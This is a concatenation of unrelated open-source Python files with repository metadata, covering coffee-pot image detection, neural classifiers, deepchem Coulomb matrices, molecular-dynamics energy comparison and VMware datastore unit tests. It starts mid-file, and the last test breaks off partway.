break print '{0} finish produce works'.format(self.name)
bluedazzle/django-angularjs-blog
app/blog_lab/new_proxy/ProxyProducer.py
Python
bsd-2-clause
2,085
import numpy as np import argparse import glob import cv2 import io import picamera from Twitter import Twitter import onlineCoffee import time def auto_canny(image, sigma=0.33): v = np.median(image) lower = int(max(0, (1.0 - sigma) * v)) upper = int(min(255, (1.0 + sigma) * v)) edged = cv2.Canny(image, lower, upper) return edged def r(image): #image = cv2.imread('2.jpg') gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) blurred = cv2.GaussianBlur(gray, (1,1), 1) wide = cv2.Canny(blurred, 10, 50) tight = cv2.Canny(blurred, 225, 250) auto = auto_canny(blurred) # show the images return wide def houghlines(im,h): #im = cv2.imread('2.jpg') #ret,gray = cv2.threshold(im,40,255,cv2.THRESH_TOZERO_INV) #gray = cv2.cvtColor(im,cv2.COLOR_BGR2GRAY) #edges = cv2.Canny(gray,10,200) def getKey(item): return abs(item[1]-item[3]) edges = r(im) lines = cv2.HoughLines(edges,20,np.pi/190,100) horizontal = [] for line in lines: for rho,theta in line: a = np.cos(theta) b = np.sin(theta) x0 = a*rho y0 = b*rho x1 = int(x0 + 1000*(-b)) # Here i have used int() instead of rounding the decimal value, so 3.8 --> 3 y1 = int(y0 + 1000*(a)) # But if you want to round the number, then use np.around() function, then 3.8 --> 4.0 x2 = int(x0 - 1000*(-b)) # But we need integers, so use int() function after that, ie int(np.around(x)) y2 = int(y0 - 1000*(a)) #cv2.line(im,(x1,y1),(x2,y2),(0,255,0),2) #print(str(x1) + " " + str(y1) + " " + str(x2) + " " + str(y2)) horizontal.append((x1,y1,x2,y2)) #cv2.imshow('houghlines',im) #cv2.waitKey(0) #cv2.destroyAllWindows() horizontal = sorted(horizontal,key=getKey) i = 0 votes = 0 while True: cv2.line(im,(horizontal[i][0],horizontal[i][1]),(horizontal[i][2],horizontal[i][3]),(200,0,0),2) average = (horizontal[i][1]+horizontal[i][3])/2.0 percent = average/h actual = 100-(percent*100) if actual > 80: i += 1 print(actual) elif actual < 25: print(actual) votes +=1 i +=1 elif actual <30: print("the coffee pot is getting low " + str(actual) + "% full!") return votes,actual else: print("the coffee pot is " + str(actual) + "% full!") return votes,actual def detect(): stream = io.BytesIO() #Get the picture (low resolution, so it should be quite fast) #Here you can also specify other parameters (e.g.:rotate the image) with picamera.PiCamera() as camera: camera.resolution = (700, 525) camera.capture(stream, format='jpeg') buff = np.fromstring(stream.getvalue(), dtype=np.uint8) #Now creates an OpenCV image img = cv2.imdecode(buff, 1) #img = cv2.imread('coffee.jpg') face_cascade = cv2.CascadeClassifier('/home/pi/Documents/OpenCV_Projects/XML_Files/coffeePot.xml') eye_cascade = cv2.CascadeClassifier('/home/pi/Documents/OpenCV_Projects/XML_Files/liquid.xml') gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) faces = face_cascade.detectMultiScale(gray, 1.2, 500, minSize=(80,100)) for (x,y,w,h) in faces: img = cv2.rectangle(img,(x,y),(x+w,y+h),(255,0,0),2) roi_gray = gray[y:y+h, x:x+w] roi_color = img[y:y+h, x:x+w] eyes = eye_cascade.detectMultiScale(roi_gray, 1.2, 10, minSize=(70,50)) return houghlines(roi_color,h) while True: percent = 0 votes = 0 t = Twitter() for i in range(0,20): numVotes,numPercent =detect() percent += numPercent votes += numVotes percent /= 20 print("********* UPDATING **********") if votes > 20: onlineCoffee.updateCoffeeSite("We've most likely run out of coffee... I blame Kevin") #t.tweet("We've most likely run out of coffee... I blame Kevin") else: onlineCoffee.updateCoffeeSite("There's plenty of coffee! It's " + str(int(percent)) + "% full!") #t.tweet("There's plenty of coffee! 
It's " + str(int(percent)) + "% full!") print(votes)
ciauri/CoffeeRobot
MeasureCoffee.py
Python
mit
4,323
""" Class for mass-univariate classification """ from numpy import in1d, zeros, array, size, float64, asarray from thunder.rdds.series import Series class MassUnivariateClassifier(object): """ Base class for performing classification. Assumes a Series with array data such that each entry belongs to one of several categories. Uses independent classifiers to train and predict. Example usage: determining how well each individual neural signal predicts a behavior. Parameters ---------- paramfile : str or dict A Python dictionary, or MAT file, containing parameters for training classifiers. At minimum must contain a "labels" field, with the label to classify at each time point. Can additionally include fields for "features" (which feature was present at each time point) and "samples" (which sample was present at each time point) Attributes ---------- `labels` : array Array containing the label for each time point `features` : array Which feature was present at each time point `nfeatures` : int, optional Number of features `samples` : array Which sample does each time point belong to `sampleIds` : list Unique samples `nsamples` : int Number of samples """ def __init__(self, paramFile): from scipy.io import loadmat if type(paramFile) is str: params = loadmat(paramFile, squeeze_me=True) elif type(paramFile) is dict: params = paramFile else: raise TypeError("Parameters for classification must be provided as string with file location," + " or dictionary") self.labels = params['labels'] if 'features' in params: self.features = params['features'] self.nfeatures = len(list(set(self.features.flatten()))) self.samples = params['samples'] self.sampleIds = list(set(self.samples.flatten())) self.nsamples = len(self.sampleIds) else: self.nfeatures = 1 self.nsamples = len(self.labels) @staticmethod def load(paramFile, classifyMode, **opts): from thunder.utils.common import checkParams checkParams(classifyMode.lower(), CLASSIFIERS.keys()) return CLASSIFIERS[classifyMode.lower()](paramFile, **opts) def get(self, x, featureSet=None): pass def fit(self, data, featureSet=None): """ Run classification on each record in a data set Parameters ---------- data: Series or a subclass (e.g. RowMatrix) Data to perform classification on, must be a collection of key-value pairs where the keys are identifiers and the values are one-dimensional arrays featureset : array, optional, default = None Which features to use Returns ------- perf : Series The performance of the classifer for each record """ if not isinstance(data, Series): raise Exception('Input must be Series or a subclass (e.g. RowMatrix)') if self.nfeatures == 1: perf = data.rdd.mapValues(lambda x: [self.get(x)]) else: if featureSet is None: featureSet = [[self.features[0]]] for i in featureSet: assert array([item in i for item in self.features]).sum() != 0, "Feature set invalid" perf = data.rdd.mapValues(lambda x: asarray(map(lambda j: self.get(x, j), featureSet))) return Series(perf, index=featureSet).__finalize__(data) class GaussNaiveBayesClassifier(MassUnivariateClassifier): """ Classifier for Gaussian Naive Bayes classification. 
    Parameters
    ----------
    paramfile : str or dict
        Parameters for classification, see MassUnivariateClassifier

    cv : int
        Folds of cross-validation, none if 0
    """
    def __init__(self, paramfile, cv=0):
        MassUnivariateClassifier.__init__(self, paramfile)

        from sklearn.naive_bayes import GaussianNB
        from sklearn import cross_validation
        self.cvFunc = cross_validation.cross_val_score
        self.cv = cv
        self.func = GaussianNB()

    def get(self, x, featureSet=None):
        """
        Compute classification performance

        Parameters
        ----------
        x : array
            Data for a single record

        featureset : array, optional, default = None
            Which features to use

        Returns
        -------
        perf : scalar
            Performance of the classifier on this record
        """
        y = self.labels
        if self.nfeatures == 1:
            X = zeros((self.nsamples, 1))
            X[:, 0] = x
        else:
            X = zeros((self.nsamples, size(featureSet)))
            for i in range(0, self.nsamples):
                inds = (self.samples == self.sampleIds[i]) & (in1d(self.features, featureSet))
                X[i, :] = x[inds]

        if self.cv > 0:
            return self.cvFunc(self.func, X, y, cv=self.cv).mean()
        else:
            ypred = self.func.fit(X, y).predict(X)
            perf = array(y == ypred).mean()
            return perf


class TTestClassifier(MassUnivariateClassifier):
    """
    Classifier for TTest classification.

    Parameters
    ----------
    paramfile : str or dict
        Parameters for classification, see MassUnivariateClassifier
    """
    def __init__(self, paramfile):
        MassUnivariateClassifier.__init__(self, paramfile)

        from scipy.stats import ttest_ind
        self.func = ttest_ind
        unique = list(set(list(self.labels)))
        if len(unique) != 2:
            raise TypeError("Only two types of labels allowed for t-test classification")
        # compare the set of observed label values against {0, 1};
        # comparing the list directly to a set is always unequal
        if set(unique) != set((0, 1)):
            self.labels = array(map(lambda i: 0 if i == unique[0] else 1, self.labels))

    def get(self, x, featureSet=None):
        """
        Compute classification performance as a t-statistic

        Parameters
        ----------
        x : array
            Data for a single record

        featureset : array, optional, default = None
            Which features to use

        Returns
        -------
        t : scalar
            t-statistic for this record
        """
        if (self.nfeatures > 1) & (size(featureSet) > 1):
            X = zeros((self.nsamples, size(featureSet)))
            for i in range(0, size(featureSet)):
                X[:, i] = x[self.features == featureSet[i]]
            t = float64(self.func(X[self.labels == 0, :], X[self.labels == 1, :])[0])
        else:
            if self.nfeatures > 1:
                x = x[self.features == featureSet]
            t = float64(self.func(x[self.labels == 0], x[self.labels == 1])[0])

        return t


# keys should be all lowercase, access should call .lower()
CLASSIFIERS = {
    'gaussnaivebayes': GaussNaiveBayesClassifier,
    'ttest': TTestClassifier
}
oliverhuangchao/thunder
thunder/decoding/uniclassify.py
Python
apache-2.0
7,078
# Bloom Framework # # John Boxall # Copyright 2008 Handi Mobility # www.handimobility.ca
kevintom/django-bloom
bloom/image/templatetags/__init__.py
Python
gpl-3.0
89
#!/usr/bin/env python __author__ = 'Andreas M. Wahl' import sys import os import random class SimulatorMock: def __init__(self, runDirectory, uuid): self.runDirectory = runDirectory self.uuid = uuid def writeOutput(self): strings = ['scalar SimpleUnderlayNetwork.globalObserver.globalStatistics "TupleFeeder: First contact - Avg.mean"', 'scalar SimpleUnderlayNetwork.globalObserver.globalStatistics "TupleFeeder: First contact - Max.mean"', 'scalar SimpleUnderlayNetwork.globalObserver.globalStatistics "TupleFeeder: First contact - Min.mean"', 'scalar SimpleUnderlayNetwork.globalObserver.globalStatistics "TupleFeeder: Latency - All nodes - Avg.mean"', 'scalar SimpleUnderlayNetwork.globalObserver.globalStatistics "TupleFeeder: Latency - All nodes - Max.mean"', 'scalar SimpleUnderlayNetwork.globalObserver.globalStatistics "TupleFeeder: Latency - All nodes - Min.mean"', 'scalar SimpleUnderlayNetwork.globalObserver.globalStatistics "TupleFeeder: Latency - One node - Avg.mean"', 'scalar SimpleUnderlayNetwork.globalObserver.globalStatistics "TupleFeeder: Latency - One node - Max.mean"', 'scalar SimpleUnderlayNetwork.globalObserver.globalStatistics "TupleFeeder: Latency - One node - Min.mean"', 'scalar SimpleUnderlayNetwork.globalObserver.globalStatistics "TupleFeeder: Received packets.mean"', 'scalar SimpleUnderlayNetwork.globalObserver.globalStatistics "TupleFeeder: Sent packets.mean"'] fileContent = "" for string in strings: fileContent += string + " " + str(random.random()) + "\n" fileName = self.runDirectory + "/results/" + str(self.uuid) + "-0.sca" dir = os.path.dirname(fileName) if not os.path.exists(dir): os.makedirs(dir) fileObject = open(fileName, 'w') fileObject.write(fileContent) print "End." sys.stdout.flush() mock = SimulatorMock(sys.argv[1], sys.argv[2]) mock.writeOutput()
ClockworkOrigins/m2etis
configurator/autosim/mock/SimulatorMock.py
Python
apache-2.0
2,146
""" Generate coulomb matrices for molecules. See Montavon et al., _New Journal of Physics_ __15__ (2013) 095003. """ import numpy as np import deepchem as dc from deepchem.feat.base_classes import MolecularFeaturizer from deepchem.utils import pad_array from deepchem.feat.atomic_coordinates import AtomicCoordinates class BPSymmetryFunctionInput(MolecularFeaturizer): """Calculate Symmetry Function for each atom in the molecules This method is described in [1]_ References ---------- .. [1] Behler, Jörg, and Michele Parrinello. "Generalized neural-network representation of high-dimensional potential-energy surfaces." Physical review letters 98.14 (2007): 146401. Note ---- This class requires RDKit to be installed. """ def __init__(self, max_atoms): """Initialize this featurizer. Parameters ---------- max_atoms: int The maximum number of atoms expected for molecules this featurizer will process. """ self.max_atoms = max_atoms def _featurize(self, mol): coordfeat = AtomicCoordinates() coordinates = coordfeat._featurize(mol)[0] atom_numbers = np.array([atom.GetAtomicNum() for atom in mol.GetAtoms()]) atom_numbers = np.expand_dims(atom_numbers, axis=1) assert atom_numbers.shape[0] == coordinates.shape[0] n_atoms = atom_numbers.shape[0] features = np.concatenate([atom_numbers, coordinates], axis=1) return np.pad(features, ((0, self.max_atoms - n_atoms), (0, 0)), 'constant') class CoulombMatrix(MolecularFeaturizer): """Calculate Coulomb matrices for molecules. Coulomb matrices provide a representation of the electronic structure of a molecule. This method is described in [1]_. Parameters ---------- max_atoms : int Maximum number of atoms for any molecule in the dataset. Used to pad the Coulomb matrix. remove_hydrogens : bool, optional (default False) Whether to remove hydrogens before constructing Coulomb matrix. randomize : bool, optional (default False) Whether to randomize Coulomb matrices to remove dependence on atom index order. upper_tri : bool, optional (default False) Whether to return the upper triangular portion of the Coulomb matrix. n_samples : int, optional (default 1) Number of random Coulomb matrices to generate if randomize is True. seed : int, optional Random seed. Example ------- >>> featurizers = dc.feat.CoulombMatrix(max_atoms=23) >>> input_file = 'deepchem/feat/tests/data/water.sdf' # really backed by water.sdf.csv >>> tasks = ["atomization_energy"] >>> loader = dc.data.SDFLoader(tasks, featurizer=featurizers) >>> dataset = loader.create_dataset(input_file) #doctest: +ELLIPSIS Reading structures from deepchem/feat/tests/data/water.sdf. References ---------- .. [1] Montavon, Grégoire, et al. "Learning invariant representations of molecules for atomization energy prediction." Advances in neural information processing systems. 2012. Note ---- This class requires RDKit to be installed. """ conformers = True name = 'coulomb_matrix' def __init__(self, max_atoms, remove_hydrogens=False, randomize=False, upper_tri=False, n_samples=1, seed=None): """Initialize this featurizer. Parameters ---------- max_atoms: int The maximum number of atoms expected for molecules this featurizer will process. remove_hydrogens: bool, optional (default False) If True, remove hydrogens before processing them. randomize: bool, optional (default False) If True, use method `randomize_coulomb_matrices` to randomize Coulomb matrices. upper_tri: bool, optional (default False) Generate only upper triangle part of Coulomb matrices. 
n_samples: int, optional (default 1) If `randomize` is set to True, the number of random samples to draw. seed: int, optional (default None) Random seed to use. """ try: from rdkit import Chem except ModuleNotFoundError: raise ValueError("This class requires RDKit to be installed.") self.max_atoms = int(max_atoms) self.remove_hydrogens = remove_hydrogens self.randomize = randomize self.upper_tri = upper_tri self.n_samples = n_samples if seed is not None: seed = int(seed) self.seed = seed def _featurize(self, mol): """ Calculate Coulomb matrices for molecules. If extra randomized matrices are generated, they are treated as if they are features for additional conformers. Since Coulomb matrices are symmetric, only the (flattened) upper triangular portion is returned. Parameters ---------- mol : RDKit Mol Molecule. """ features = self.coulomb_matrix(mol) if self.upper_tri: features = [f[np.triu_indices_from(f)] for f in features] features = np.asarray(features) return features def coulomb_matrix(self, mol): """ Generate Coulomb matrices for each conformer of the given molecule. Parameters ---------- mol : RDKit Mol Molecule. """ from rdkit import Chem if self.remove_hydrogens: mol = Chem.RemoveHs(mol) n_atoms = mol.GetNumAtoms() z = [atom.GetAtomicNum() for atom in mol.GetAtoms()] rval = [] for conf in mol.GetConformers(): d = self.get_interatomic_distances(conf) m = np.outer(z, z) / d m[range(n_atoms), range(n_atoms)] = 0.5 * np.array(z)**2.4 if self.randomize: for random_m in self.randomize_coulomb_matrix(m): random_m = pad_array(random_m, self.max_atoms) rval.append(random_m) else: m = pad_array(m, self.max_atoms) rval.append(m) rval = np.asarray(rval) return rval def randomize_coulomb_matrix(self, m): """Randomize a Coulomb matrix as decribed in [1]_: 1. Compute row norms for M in a vector row_norms. 2. Sample a zero-mean unit-variance noise vector e with dimension equal to row_norms. 3. Permute the rows and columns of M with the permutation that sorts row_norms + e. Parameters ---------- m : ndarray Coulomb matrix. n_samples : int, optional (default 1) Number of random matrices to generate. seed : int, optional Random seed. References ---------- .. [1] Montavon et al., New Journal of Physics, 15, (2013), 095003 """ rval = [] row_norms = np.asarray([np.linalg.norm(row) for row in m], dtype=float) rng = np.random.RandomState(self.seed) for i in range(self.n_samples): e = rng.normal(size=row_norms.size) p = np.argsort(row_norms + e) new = m[p][:, p] # permute rows first, then columns rval.append(new) return rval @staticmethod def get_interatomic_distances(conf): """ Get interatomic distances for atoms in a molecular conformer. Parameters ---------- conf : RDKit Conformer Molecule conformer. """ n_atoms = conf.GetNumAtoms() coords = [ conf.GetAtomPosition(i).__idiv__(0.52917721092) for i in range(n_atoms) ] # Convert AtomPositions from Angstrom to bohr (atomic units) d = np.zeros((n_atoms, n_atoms), dtype=float) for i in range(n_atoms): for j in range(i): d[i, j] = coords[i].Distance(coords[j]) d[j, i] = d[i, j] return d class CoulombMatrixEig(CoulombMatrix): """Calculate the eigenvalues of Coulomb matrices for molecules. This featurizer computes the eigenvalues of the Coulomb matrices for provided molecules. Coulomb matrices are described in [1]_. Parameters ---------- max_atoms : int Maximum number of atoms for any molecule in the dataset. Used to pad the Coulomb matrix. remove_hydrogens : bool, optional (default False) Whether to remove hydrogens before constructing Coulomb matrix. 
randomize : bool, optional (default False) Whether to randomize Coulomb matrices to remove dependence on atom index order. n_samples : int, optional (default 1) Number of random Coulomb matrices to generate if randomize is True. seed : int, optional Random seed. Example ------- >>> featurizers = dc.feat.CoulombMatrixEig(max_atoms=23) >>> input_file = 'deepchem/feat/tests/data/water.sdf' # really backed by water.sdf.csv >>> tasks = ["atomization_energy"] >>> loader = dc.data.SDFLoader(tasks, featurizer=featurizers) >>> dataset = loader.create_dataset(input_file) #doctest: +ELLIPSIS Reading structures from deepchem/feat/tests/data/water.sdf. References ---------- .. [1] Montavon, Grégoire, et al. "Learning invariant representations of molecules for atomization energy prediction." Advances in neural information processing systems. 2012. """ conformers = True name = 'coulomb_matrix' def __init__(self, max_atoms, remove_hydrogens=False, randomize=False, n_samples=1, seed=None): """Initialize this featurizer. Parameters ---------- max_atoms: int The maximum number of atoms expected for molecules this featurizer will process. remove_hydrogens: bool, optional (default False) If True, remove hydrogens before processing them. randomize: bool, optional (default False) If True, use method `randomize_coulomb_matrices` to randomize Coulomb matrices. n_samples: int, optional (default 1) If `randomize` is set to True, the number of random samples to draw. seed: int, optional (default None) Random seed to use. """ self.max_atoms = int(max_atoms) self.remove_hydrogens = remove_hydrogens self.randomize = randomize self.n_samples = n_samples if seed is not None: seed = int(seed) self.seed = seed def _featurize(self, mol): """ Calculate eigenvalues of Coulomb matrix for molecules. Eigenvalues are returned sorted by absolute value in descending order and padded by max_atoms. Parameters ---------- mol : RDKit Mol Molecule. """ cmat = self.coulomb_matrix(mol) features = [] for f in cmat: w, v = np.linalg.eig(f) w_abs = np.abs(w) sortidx = np.argsort(w_abs) sortidx = sortidx[::-1] w = w[sortidx] f = pad_array(w, self.max_atoms) features.append(f) features = np.asarray(features) return features
miaecle/deepchem
deepchem/feat/coulomb_matrices.py
Python
mit
10,564
# -*- coding: utf-8 -*- # # Picard, the next-generation MusicBrainz tagger # Copyright (C) 2006 Lukáš Lalinský # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. from PyQt4 import QtGui from picard.plugin import ExtensionPoint class OptionsCheckError(Exception): def __init__(self, title, info): self.title = title self.info = info class OptionsPage(QtGui.QWidget): PARENT = None SORT_ORDER = 1000 ACTIVE = True def info(self): raise NotImplementedError def check(self): pass def load(self): pass def save(self): pass def display_error(self, error): dialog = QtGui.QMessageBox(QtGui.QMessageBox.Warning, error.title, error.info, QtGui.QMessageBox.Ok, self) dialog.exec_() _pages = ExtensionPoint() def register_options_page(page_class): _pages.register(page_class.__module__, page_class)
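# Illustrative sketch of how a page plugs into the extension point defined
# above; this class and its contents are hypothetical, not an actual Picard
# options page.
class ExampleOptionsPage(OptionsPage):

    PARENT = None
    SORT_ORDER = 500
    ACTIVE = True

    def info(self):
        return "An example options page"

    def load(self):
        pass  # read configuration values into the page's widgets here

    def save(self):
        pass  # write widget state back to the configuration here


register_options_page(ExampleOptionsPage)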
lalinsky/picard-debian
picard/ui/options/__init__.py
Python
gpl-2.0
1,569
import itertools from pathlib import Path import numpy as np import tensorflow as tf from model import SequenceClassifier, ThalNetCell, GRUCell,MLPClassifier from util import timestamp from tensorflow.examples.tutorials.mnist import input_data import argparse from plot import plot_learning_curve def plot_image(image: np.ndarray, label: str) -> None: from matplotlib import pyplot as plt plt.title(f'Label {label}') plt.imshow(image) plt.show() def main(batch_size: int = 100, log_path: Path = Path.home() / 'Desktop/thalnet/tensorboard' / timestamp()): mnist = input_data.read_data_sets('mnist', one_hot=True) num_classes = 10 num_rows, row_size = 28,28 summary_writer = tf.summary.FileWriter(str(log_path), graph=tf.get_default_graph()) def get_batch(train,batch_size): """Make a TensorFlow feed_dict: maps data onto Tensor placeholders.""" if train: xs, ys = mnist.train.next_batch(batch_size) else: #rows = np.random.randint(1000,size=batch_size) #xs, ys = mnist.test.images[:rows,:], mnist.test.labels[:rows,:] xs, ys = mnist.test.images[:1000,:], mnist.test.labels[:1000,:] return {'x': xs, 'y': ys} def feed_dict(batch): return {data: batch['x'], target: batch['y'], dropout: 0} get_thalnet_cell = lambda: ThalNetCell(input_size=row_size, output_size=num_classes, context_input_size=32, center_size_per_module=32,num_modules=4) get_stacked_cell = lambda: GRUCell(num_hidden=50,num_layers=4) models = [lambda: MLPClassifier(data, target, dropout, num_hidden=64, num_layers=2), lambda: SequenceClassifier(data, target, dropout, get_rnn_cell=get_stacked_cell,num_rows=num_rows, row_size=row_size), lambda: SequenceClassifier(data, target, dropout, get_rnn_cell=get_thalnet_cell,num_rows=num_rows, row_size=row_size) ] labels = ['MLP-baseline','GRU-baseline','ThalNet-FF-GRU'] ys,zs = [],[] for model in models: with tf.Session() as session: data = tf.placeholder(tf.float32, [None, num_rows*row_size], name='data') target = tf.placeholder(tf.float32, [None, num_classes], name='target') dropout = tf.placeholder(tf.float32, name='dropout') model = model() # reproduce result under 60,000 total parameters for all three models print(f'{model.num_parameters} parameters') if model.num_parameters > 60000: session.close() return y,z = [],[] session.run(tf.global_variables_initializer()) for batch_index in itertools.count(): train_batch = get_batch(True,batch_size) _, train_cross_entropy, train_accuracy, train_summary = session.run( [model.optimize, model.cross_entropy, model.accuracy, model.train_summary], feed_dict=feed_dict(train_batch)) summary_writer.add_summary(train_summary, batch_index) if batch_index % 1 == 0: test_batch = get_batch(False,batch_size) test_cross_entropy, test_accuracy, test_summary = session.run( [model.cross_entropy, model.accuracy, model.test_summary], feed_dict=feed_dict(test_batch)) summary_writer.add_summary(test_summary, batch_index) summary_writer.add_summary(session.run(model.weights_summary), batch_index) y.append(test_accuracy) z.append(test_cross_entropy) print( f'Batch {batch_index}: train accuracy {train_accuracy:.3f} (cross entropy {train_cross_entropy:.3f}), test accuracy {test_accuracy:.3f} (cross entropy {test_cross_entropy:.3f})') if batch_index == 2000: ys.append(y) zs.append(z) break session.close() tf.reset_default_graph() plot_learning_curve('Sequential Mnist',ys,zs, labels,ylim=(0,1)) if __name__ == '__main__': parser = argparse.ArgumentParser() args = parser.parse_args() main()
JuliusKunze/thalnet
main.py
Python
mit
4,277
import os from collections import OrderedDict import sys fil = open('energy.xvg').readlines() GMX_dat = [float(f)/4.184 for f in fil[-1].split()[1:-1]] nfil = open('LOG_NAMD').readlines() for line in nfil: if 'ENERGY: 200' in line: NAMD_DAT = [float(f) for f in line.split()[2:12]] #print(NAMD_DAT) #print(GMX_dat) print('GMX: %6.3f NAMD: %6.3f BOND_DIFF: %5.5f'%(GMX_dat[0],NAMD_DAT[0],GMX_dat[0]-NAMD_DAT[0])) print('GMX: %6.3f NAMD: %6.3f ANGL_DIFF: %5.5f'%(GMX_dat[1],NAMD_DAT[1],GMX_dat[1]-NAMD_DAT[1])) print('GMX: %6.3f NAMD: %6.3f TORS_DIFF: %5.5f'%(GMX_dat[2],NAMD_DAT[2],GMX_dat[2]-NAMD_DAT[2])) print('GMX: %6.3f NAMD: %6.3f IMPR_DIFF: %5.5f'%(GMX_dat[3],NAMD_DAT[3],GMX_dat[3]-NAMD_DAT[3])) print('GMX: %6.3f NAMD: %6.3f ELEC_DIFF: %5.5f'%(GMX_dat[5]+GMX_dat[7],NAMD_DAT[4],(GMX_dat[5]+GMX_dat[7])-(NAMD_DAT[4]))) print('GMX: %6.3f NAMD: %6.3f VDWL_DIFF: %5.5f'%(GMX_dat[4]+GMX_dat[6],NAMD_DAT[5],GMX_dat[4]+GMX_dat[6]-NAMD_DAT[5])) print('GMX: %6.3f NAMD: %6.3f TOTL_DIFF: %5.5f'%(GMX_dat[8],NAMD_DAT[9],GMX_dat[8]-NAMD_DAT[9]))
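# Illustrative helper (not used above): the same kJ/mol -> kcal/mol conversion
# applied to a single value, spelled out to make the 4.184 factor explicit.
def kj_to_kcal(energy_kj_per_mol):
    return energy_kj_per_mol / 4.184

# e.g. kj_to_kcal(418.4) -> 100.0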
leelasd/OPLS-AAM_for_Gromacs
GMX_TEST/GXG/RN/NAMD_GMX_DIFF.py
Python
mit
1,063
# Copyright (c) 2014 VMware, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import contextlib import re import mock from oslo_utils import units from oslo_vmware import exceptions as vexc from oslo_vmware.objects import datastore as ds_obj from nova import exception from nova import test from nova.tests.unit.virt.vmwareapi import fake from nova.virt.vmwareapi import ds_util class DsUtilTestCase(test.NoDBTestCase): def setUp(self): super(DsUtilTestCase, self).setUp() self.session = fake.FakeSession() self.flags(api_retry_count=1, group='vmware') fake.reset() def tearDown(self): super(DsUtilTestCase, self).tearDown() fake.reset() def test_file_delete(self): def fake_call_method(module, method, *args, **kwargs): self.assertEqual('DeleteDatastoreFile_Task', method) name = kwargs.get('name') self.assertEqual('[ds] fake/path', name) datacenter = kwargs.get('datacenter') self.assertEqual('fake-dc-ref', datacenter) return 'fake_delete_task' with contextlib.nested( mock.patch.object(self.session, '_wait_for_task'), mock.patch.object(self.session, '_call_method', fake_call_method) ) as (_wait_for_task, _call_method): ds_path = ds_obj.DatastorePath('ds', 'fake/path') ds_util.file_delete(self.session, ds_path, 'fake-dc-ref') _wait_for_task.assert_has_calls([ mock.call('fake_delete_task')]) def test_file_copy(self): def fake_call_method(module, method, *args, **kwargs): self.assertEqual('CopyDatastoreFile_Task', method) src_name = kwargs.get('sourceName') self.assertEqual('[ds] fake/path/src_file', src_name) src_dc_ref = kwargs.get('sourceDatacenter') self.assertEqual('fake-src-dc-ref', src_dc_ref) dst_name = kwargs.get('destinationName') self.assertEqual('[ds] fake/path/dst_file', dst_name) dst_dc_ref = kwargs.get('destinationDatacenter') self.assertEqual('fake-dst-dc-ref', dst_dc_ref) return 'fake_copy_task' with contextlib.nested( mock.patch.object(self.session, '_wait_for_task'), mock.patch.object(self.session, '_call_method', fake_call_method) ) as (_wait_for_task, _call_method): src_ds_path = ds_obj.DatastorePath('ds', 'fake/path', 'src_file') dst_ds_path = ds_obj.DatastorePath('ds', 'fake/path', 'dst_file') ds_util.file_copy(self.session, str(src_ds_path), 'fake-src-dc-ref', str(dst_ds_path), 'fake-dst-dc-ref') _wait_for_task.assert_has_calls([ mock.call('fake_copy_task')]) def test_file_move(self): def fake_call_method(module, method, *args, **kwargs): self.assertEqual('MoveDatastoreFile_Task', method) sourceName = kwargs.get('sourceName') self.assertEqual('[ds] tmp/src', sourceName) destinationName = kwargs.get('destinationName') self.assertEqual('[ds] base/dst', destinationName) sourceDatacenter = kwargs.get('sourceDatacenter') self.assertEqual('fake-dc-ref', sourceDatacenter) destinationDatacenter = kwargs.get('destinationDatacenter') self.assertEqual('fake-dc-ref', destinationDatacenter) return 'fake_move_task' with contextlib.nested( mock.patch.object(self.session, '_wait_for_task'), mock.patch.object(self.session, '_call_method', fake_call_method) ) as (_wait_for_task, _call_method): src_ds_path = 
ds_obj.DatastorePath('ds', 'tmp/src') dst_ds_path = ds_obj.DatastorePath('ds', 'base/dst') ds_util.file_move(self.session, 'fake-dc-ref', src_ds_path, dst_ds_path) _wait_for_task.assert_has_calls([ mock.call('fake_move_task')]) def test_disk_move(self): def fake_call_method(module, method, *args, **kwargs): self.assertEqual('MoveVirtualDisk_Task', method) src_name = kwargs.get('sourceName') self.assertEqual('[ds] tmp/src', src_name) dest_name = kwargs.get('destName') self.assertEqual('[ds] base/dst', dest_name) src_datacenter = kwargs.get('sourceDatacenter') self.assertEqual('fake-dc-ref', src_datacenter) dest_datacenter = kwargs.get('destDatacenter') self.assertEqual('fake-dc-ref', dest_datacenter) return 'fake_move_task' with contextlib.nested( mock.patch.object(self.session, '_wait_for_task'), mock.patch.object(self.session, '_call_method', fake_call_method) ) as (_wait_for_task, _call_method): ds_util.disk_move(self.session, 'fake-dc-ref', '[ds] tmp/src', '[ds] base/dst') _wait_for_task.assert_has_calls([ mock.call('fake_move_task')]) def test_disk_copy(self): with contextlib.nested( mock.patch.object(self.session, '_wait_for_task'), mock.patch.object(self.session, '_call_method', return_value=mock.sentinel.cm) ) as (_wait_for_task, _call_method): ds_util.disk_copy(self.session, mock.sentinel.dc_ref, mock.sentinel.source_ds, mock.sentinel.dest_ds) _wait_for_task.assert_called_once_with(mock.sentinel.cm) _call_method.assert_called_once_with( mock.ANY, 'CopyVirtualDisk_Task', 'VirtualDiskManager', sourceName='sentinel.source_ds', destDatacenter=mock.sentinel.dc_ref, sourceDatacenter=mock.sentinel.dc_ref, force=False, destName='sentinel.dest_ds') def test_disk_delete(self): with contextlib.nested( mock.patch.object(self.session, '_wait_for_task'), mock.patch.object(self.session, '_call_method', return_value=mock.sentinel.cm) ) as (_wait_for_task, _call_method): ds_util.disk_delete(self.session, 'fake-dc-ref', '[ds] tmp/disk.vmdk') _wait_for_task.assert_called_once_with(mock.sentinel.cm) _call_method.assert_called_once_with( mock.ANY, 'DeleteVirtualDisk_Task', 'VirtualDiskManager', datacenter='fake-dc-ref', name='[ds] tmp/disk.vmdk') def test_mkdir(self): def fake_call_method(module, method, *args, **kwargs): self.assertEqual('MakeDirectory', method) name = kwargs.get('name') 